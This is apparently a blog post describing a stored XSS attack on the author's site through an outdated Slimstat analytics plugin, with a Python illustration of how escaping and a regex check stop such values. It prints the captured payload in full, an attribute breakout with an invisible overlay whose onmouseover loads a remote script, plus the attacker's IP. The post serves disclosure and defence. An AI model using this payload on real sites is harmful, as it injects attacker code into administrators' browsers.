Just last week or so, while going over my real-time analytics, I noticed an interesting payload tied to one particular user's web visit.
I was scanning over Slimstat's real-time analytics view, which shows visits (active and intraday). Slimstat is great for this, and I think I was three updates behind on it. Slimstat is built with JavaScript, by the way. Regardless, they found a hole. That's all it takes!
This user (or APT group) found I hadn't updated my Slimstat analytics and then got to work. This obviously isn't just your run-of-the-mill XSS payload! If I had to guess, this group, at their highly sophisticated level, likely took half a day to craft it. Their IP originated from Frankfurt, and it has ties to the infamous Mirai malware (via VirusTotal hashes, etc.).
URL exploited: /test-user-creator.
The IP: 84.201.4.181 (with an unknown OS).
And the XSS payload: http://attacker.com/user.js' style='position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;z-index:9999;' onmouseover='var s=document.createElement("script");s.src="https://staticsx.top/x.js";document.body.appendChild(s);' x=' external
Now, was it effective? Yes it was. As I was viewing my analytics, it actually opened a new browser tab on me in Chrome. I was impressed, to say the least.
I quickly disabled the plugin, logged out, logged back in, and saved this as a draft for this blog post.
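As an added illustration (not code from this post or from Slimstat), here is how a referrer value shaped like the payload above breaks out of an href attribute when a dashboard drops it in unescaped, how escaping the value neutralises it, and a simple check that flags such values in analytics records. The hostnames and the row template are constructed assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample referrer values shaped like the payload above.
# Hostnames are placeholders, not the ones from the post.
BENIGN_REF = "https://example.org/page?q=1"
HOSTILE_REF = ("http://attacker.example/user.js' style='position:fixed;top:0;"
               "left:0;width:100%;height:100%;opacity:0;z-index:9999;' "
               "onmouseover='var s=document.createElement(\"script\");"
               "s.src=\"https://script-host.example/x.js\";"
               "document.body.appendChild(s);' x='")

def render_unsafe(referrer: str) -> str:
    """Assumed dashboard row: the referrer is dropped straight into an attribute."""
    return f"<a href='{referrer}' target='_blank'>{referrer}</a>"

def render_safe(referrer: str) -> str:
    """Same row with the value escaped for both contexts (quote=True covers ' and \")."""
    safe = html.escape(referrer, quote=True)
    return f"<a href='{safe}' target='_blank'>{safe}</a>"

class _AttrCollector(HTMLParser):
    """Collects the attribute names a parser actually sees in the rendered markup."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name.lower() for name, _ in attrs)

def injected_attributes(markup: str) -> set:
    """Event handlers and style attributes that made it into the rendered markup."""
    p = _AttrCollector()
    p.feed(markup)
    return {n for n in p.names if n.startswith("on") or n == "style"}

# A quote followed by a fresh attribute name is the signature of an attribute breakout.
BREAKOUT = re.compile(r"""['"]\s*(?:style|on\w+|src|href)\s*=""", re.IGNORECASE)

def looks_like_attribute_injection(value: str) -> bool:
    """Flag a referrer or user-agent value that tries to close an attribute and add its own."""
    return BREAKOUT.search(value) is not None

if __name__ == "__main__":
    for ref in (BENIGN_REF, HOSTILE_REF):
        print(looks_like_attribute_injection(ref),
              injected_attributes(render_unsafe(ref)),
              injected_attributes(render_safe(ref)))
```

The unsafe rendering yields a live style and onmouseover attribute on the link; the escaped rendering keeps the whole string inside href as inert text.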